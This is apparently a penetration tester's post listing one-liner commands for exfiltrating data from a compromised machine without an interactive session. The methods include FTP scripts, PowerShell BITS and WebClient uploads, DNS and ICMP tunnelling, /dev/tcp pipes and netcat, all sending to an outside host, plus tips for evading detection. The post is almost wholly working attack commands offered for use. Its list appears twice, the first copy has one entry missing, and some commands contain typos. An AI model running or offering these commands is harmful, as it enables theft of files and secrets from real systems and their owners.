Native / Noninteractive Exfiltration Ideas
Pulled the following from various resources (big shoutout to commandlinekungfu.com), a collection of one liners and non-interactive commands to exfiltrate data when all you have is a shell. Note, with the windows powershell commands, if you have too many quotations and it breaks the statements try encoding your statements as base64, then executing them using -encodedCommand. If you can't go interactive you can try writing each line of the activity to a file, then calling that file as input to your executable, for example this works well for interactive ftp. Make sure to stop back overtime as this page is a work in progress. Enjoy and add your best exfiltration tips in the comments!
On Windows:
Using ftp (like the link above):
echo open remotehost.com 8443 > ftp.dat; echo user myuser>> ftp.dat; echo password1>> ftp.dat; echo bin>> ftp.dat; echo put localfile.txt>> ftp.dat; echo quit>> ftp.dat; ftp -n -s:ftp.dat
Using a windows share:
net use * \\remotehost.com\myshare password1 /user:myuser
Using powershell and BITS to upload to an IIS server:
powershell -noprofile -noninteractive -executionpolicy bypass -command import-module bitstransfer; start-bitstransfer -displayname BITS -source "localfile.txt" -destination http://remotehost.com/serverdir/remotefile.txt -transfertype upload
Powershell upload to a webserver:
powershell -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server="""http://remotehost.com/serverdir"""; $filepath="""C:\master.zip"""; $http = new-object System.Net.WebClient; $response = $http.UploadFile($server,$filepath);"
Using powershell to send an email:
powershell -noprofile -noninteractive Sent-MailMessage -to "emailaddress" -from "emailaddress" -subject "Subject" -a "attachment file path" -body "Body" -SmtpServer remotehost.com
Using powershell to send over dns queries:
powershell -executionpolicy bypass "Get-Content "localfile.txt" | ForEach-Object { nslookup $_ remotehost.com }"
On *nix:
With rsync:
rsync -aH localhost remotehost.com:/path/name
Curl over ftp:
curl -T localfile.txt ftp://remotehost.com --user myuser:password1
Tar to ssh:
tar zcf - localfolder | ssh myuser:password1@remotehost.com "cd /path/name; tar zxpf -"
Tar to curl over https:
tar zcf - localfolder | curl -F "data=@-" https://remotehost.com/script.php
Tar to base 64 to a network pipe:
tar zcf - localfolder | base 64 >/dev/tcp/remotehost.com/8443
Tar to dns queries:
tar zcf - localfolder | xxd -p -c 16 | while read line; do host $line.domain.com remotehost.com; done
Raw to dns queries:
Tar to data over icmp:
tar zcf - localfolder | xxd -p -c 16 | while read line; do ping -p $line -c 1 -q remotehost.com; done
NetCat over random port:
cat localfile.txt | nc remotehost.com 8443
On Windows:
Using ftp (like the link above):
echo open remotehost.com 8443 > ftp.dat; echo user myuser>> ftp.dat; echo password1>> ftp.dat; echo bin>> ftp.dat; echo put localfile.txt>> ftp.dat; echo quit>> ftp.dat; ftp -n -s:ftp.dat
Using a windows share:
net use * \\remotehost.com\myshare password1 /user:myuser
Using powershell and BITS to upload to an IIS server:
powershell -noprofile -noninteractive -executionpolicy bypass -command import-module bitstransfer; start-bitstransfer -displayname BITS -source "localfile.txt" -destination http://remotehost.com/serverdir/remotefile.txt -transfertype upload
Powershell upload to a webserver:
powershell -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server="""http://remotehost.com/serverdir"""; $filepath="""C:\master.zip"""; $http = new-object System.Net.WebClient; $response = $http.UploadFile($server,$filepath);"
Using powershell to send an email:
powershell -noprofile -noninteractive Sent-MailMessage -to "emailaddress" -from "emailaddress" -subject "Subject" -a "attachment file path" -body "Body" -SmtpServer remotehost.com
Using powershell to send over dns queries:
powershell -executionpolicy bypass "Get-Content "localfile.txt" | ForEach-Object { nslookup $_ remotehost.com }"
On *nix:
With rsync:
rsync -aH localhost remotehost.com:/path/name
Curl over ftp:
curl -T localfile.txt ftp://remotehost.com --user myuser:password1
Tar to ssh:
tar zcf - localfolder | ssh myuser:password1@remotehost.com "cd /path/name; tar zxpf -"
Tar to curl over https:
tar zcf - localfolder | curl -F "data=@-" https://remotehost.com/script.php
Tar to base 64 to a network pipe:
tar zcf - localfolder | base 64 >/dev/tcp/remotehost.com/8443
Tar to dns queries:
tar zcf - localfolder | xxd -p -c 16 | while read line; do host $line.domain.com remotehost.com; done
Raw to dns queries:
LINE=`cat localfile.txt`; domain="remotehost.com";while read -r -n 1 char;do var+=$(printf "%X" \'$char\');done<<<$LINE;b=0;e=60;l=${#var};while [ $b -lt $l ];do >& /dev/udp/$RANDOM.$b."${var:$b:$e}".$domain/53 0>&1;let b=b+60;done;>& /dev/udp/$RANDOM.theend.$domain/53 0>&1;unset var;unset var2
Tar to data over icmp:
tar zcf - localfolder | xxd -p -c 16 | while read line; do ping -p $line -c 1 -q remotehost.com; done
NetCat over random port:
cat localfile.txt | nc remotehost.com 8443